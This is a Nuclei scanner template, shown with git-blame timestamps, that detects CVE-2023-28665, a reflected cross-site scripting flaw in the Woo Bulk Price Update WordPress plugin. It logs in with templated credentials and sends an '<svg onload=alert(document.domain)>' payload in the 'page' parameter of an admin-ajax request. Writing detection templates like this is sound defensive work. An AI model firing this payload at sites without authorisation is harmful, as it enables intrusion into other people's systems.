nuclei-templates/http/cves/2023/CVE-2023-28665.yaml

52 lines
1.9 KiB
YAML
Raw Normal View History

2023-07-16 18:06:40 +00:00
id: CVE-2023-28665
info:
2023-07-17 17:31:00 +00:00
name: Woo Bulk Price Update <2.2.2 - Cross-Site Scripting
author: Aaban SOlutions,harsh
2023-07-16 18:06:40 +00:00
severity: medium
description: |
2023-07-17 17:31:00 +00:00
The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.
2023-09-06 11:43:37 +00:00
remediation: Fixed in version 2.2.2
2023-07-17 17:31:00 +00:00
reference:
- https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036
- https://nvd.nist.gov/vuln/detail/CVE-2023-28665
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
2023-07-17 17:31:00 +00:00
cve-id: CVE-2023-28665
2023-08-31 11:46:18 +00:00
cwe-id: CWE-79
epss-score: 0.00082
epss-percentile: 0.34307
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:*
2023-07-17 17:31:00 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-08-31 11:46:18 +00:00
vendor: technocrackers
product: bulk_price_update_for_woocommerce
2023-09-06 11:43:37 +00:00
framework: wordpress
2023-07-17 17:31:00 +00:00
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update
2023-07-16 18:06:40 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-07-17 17:31:00 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
2023-07-16 18:06:40 +00:00
- |
2023-07-17 17:31:00 +00:00
GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1
2023-07-16 18:06:40 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
2023-07-18 09:20:20 +00:00
- 'contains(header_2, "text/html")'
2023-07-17 17:31:00 +00:00
- 'contains(body_2, "<svg onload=alert(document.domain)>")'
- 'contains(body_2, "pagination\":")'
2023-07-16 18:06:40 +00:00
condition: and
# digest: 4a0a00473045022100d3abceed36b655108a9f8a41a6fc04c7ab913161801663bcab8617fcbb0bec5b0220367046a3ea8bce7928ace458e1ec6870a7810125cea6a97375e38086712ed73f:922c64590222798bb761d5b6d8e72950